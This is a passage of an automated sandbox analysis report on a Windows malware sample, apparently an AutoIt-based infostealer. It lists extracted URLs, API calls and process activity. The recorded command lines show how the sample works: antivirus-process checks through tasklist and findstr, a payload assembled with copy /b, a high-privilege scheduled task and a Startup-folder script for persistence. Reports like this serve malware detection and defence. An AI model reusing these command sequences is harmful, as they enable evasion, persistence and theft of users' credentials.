                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: Heroes.com, 00000013.00000000.2366054974.0000000000535000.00000002.00000001.01000000.0000000A.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoScan360.com, 0000001C.00000002.2509765526.00000000007F5000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                  Source: 00000123.exe, updatte.exe.0.drString found in binary or memory: http://www.newtonsoft.com/jsonschema
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.cloudinary.com
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacl
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: 00000123.exe, updatte.exe.0.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
                  Source: C:\Users\user\AppData\Local\Temp\update.exe Code function: 6_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_004050CD
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com Code function: 28_2_0079F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,28_2_0079F7C7
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com Code function: 28_2_0079F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,28_2_0079F55C
                  Source: C:\Users\user\AppData\Local\Temp\update.exe Code function: 6_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,6_2_004044A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com Code function: 28_2_007B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,28_2_007B9FD2

                  System Summary

                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, MISJyPtQaG1dvlqIy9.cs Large array initialization: TZnMwT1qw: array initializer size 360976
                  Source: C:\Users\user\Desktop\00000123.exe File dump: updatte.exe.0.dr 265687064
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js"
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com Code function: 28_2_00794763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,28_2_00794763
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com Code function: 28_2_00781B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,28_2_00781B4D
                  Source: C:\Users\user\AppData\Local\Temp\update.exe Code function: 6_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,6_2_00403883
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com Code function: 28_2_0078F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,28_2_0078F20D
                  Source: C:\Users\user\AppData\Local\Temp\update.exe File created: C:\Windows\PotatoDescription
                  Source: C:\Users\user\AppData\Local\Temp\update.exe File created: C:\Windows\UnionUnix
                  Source: C:\Users\user\AppData\Local\Temp\update.exe File created: C:\Windows\ImproveRg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745FEA737_2_0745FEA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C57B37_2_0745C57B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C52037_2_0745C520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C58837_2_0745C588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745CC4737_2_0745CC47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745DC6E37_2_0745DC6E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745FAE237_2_0745FAE2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745C2F237_2_0745C2F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745A95337_2_0745A953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745797C37_2_0745797C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0745212D37_2_0745212D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075457E037_2_075457E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754A34037_2_0754A340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754AB2037_2_0754AB20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07541B8E37_2_07541B8E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075418E837_2_075418E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07548FD437_2_07548FD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754465137_2_07544651
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754EE3037_2_0754EE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754D64137_2_0754D641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754EE1F37_2_0754EE1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754EE3037_2_0754EE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754CCEA37_2_0754CCEA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754AB1037_2_0754AB10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754A33237_2_0754A332
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07541BD337_2_07541BD3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754A3DC37_2_0754A3DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754ABBC37_2_0754ABBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754224037_2_07542240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0754223037_2_07542230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_07541A9A37_2_07541A9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075418E837_2_075418E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_075418DA37_2_075418DA
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: String function: 004062A3 appears 58 times
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: String function: 0073FD52 appears 40 times
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: String function: 00740DA0 appears 46 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1144
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 00000123.exe
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 00000123.exe
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000039CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCdyszieoz.exe" vs 00000123.exe
                  Source: 00000123.exe, 00000000.00000002.2572492480.0000000008420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: get_DiscardOriginalFilename vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: set_DiscardOriginalFilename vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: IsUseOriginalFilename vs 00000123.exe
                  Source: 00000123.exeBinary or memory string: useOriginalFilename vs 00000123.exe
                  Source: 00000123.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: update.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                  Source: 00000123.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 00000123.exe, Dnrgnk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, MISJyPtQaG1dvlqIy9.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, R7pp1CEv5h7lSYql4h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 00000123.exe, -.csBase64 encoded string: 'In85VmYXX1QvRG8fEnIjTW1UMHU5R24YHX9xZWYONGg+UHo7AnUvT2EWCD0tR3clN3MmTk0bHGNxTXMlOGgvU3YbHW8+WzgdFHIVbmYUFnIiGUQfBVIzUmY8A2knamIUFWovGWQfBVkEQ24fSk8kRmYCPmBxcGYbFVU+UGoUFj0LRmdBFmM+fVMVAm8+S2wUSmEvVlw5BHQ4R20ONWknQ2oUSlUvVkcbBWdxETRDQT5xY3AJFGsoTnopFHQ8R3FBIm8nUm8fMHU5R24YHX8PWnMWHnQvUDgYEGQvTnUXSnUnTWgfBWM5Vg=='
                  Source: wscript.exe, 0000001A.00000003.2435361451.000001AE7EAE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.2436412064.000001AE7EAE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\updatte.exe"""e.vbpl;,j
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@60/35@2/1
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007941FA GetLastError,FormatMessageW,28_2_007941FA
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00782010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,28_2_00782010
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00781A0B AdjustTokenPrivileges,CloseHandle,28_2_00781A0B
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,6_2_004044A5
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,28_2_0078DD87
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004024FB CoCreateInstance,6_2_004024FB
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00793A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,28_2_00793A0E
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:64:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\b3fab82944ce6e32
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Local\Temp\update.exe
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs"
                  Source: 00000123.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 00000123.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\Desktop\00000123.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\00000123.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: 00000123.exeReversingLabs: Detection: 23%
                  Source: C:\Users\user\Desktop\00000123.exeFile read: C:\Users\user\Desktop\00000123.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\00000123.exe "C:\Users\user\Desktop\00000123.exe"
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\00000123.exeProcess created: C:\Users\user\AppData\Local\Temp\update.exe "C:\Users\user\AppData\Local\Temp\update.exe"
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Expensive.pps Expensive.pps.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 611485
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Experts.pps
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Gd" Investigations
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 611485\Heroes.com + Closely + Sad + Sandwich + Legends + Labor + Mailing + Jersey + Dies + Disabled + Technical 611485\Heroes.com
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Utilize.pps + ..\Expenditure.pps + ..\Hacker.pps + ..\Sexually.pps + ..\Forbes.pps + ..\Taught.pps + ..\Champion.pps + ..\Eclipse.pps + ..\Plants.pps + ..\Ed.pps + ..\Midnight.pps H
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Heroes.com H
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
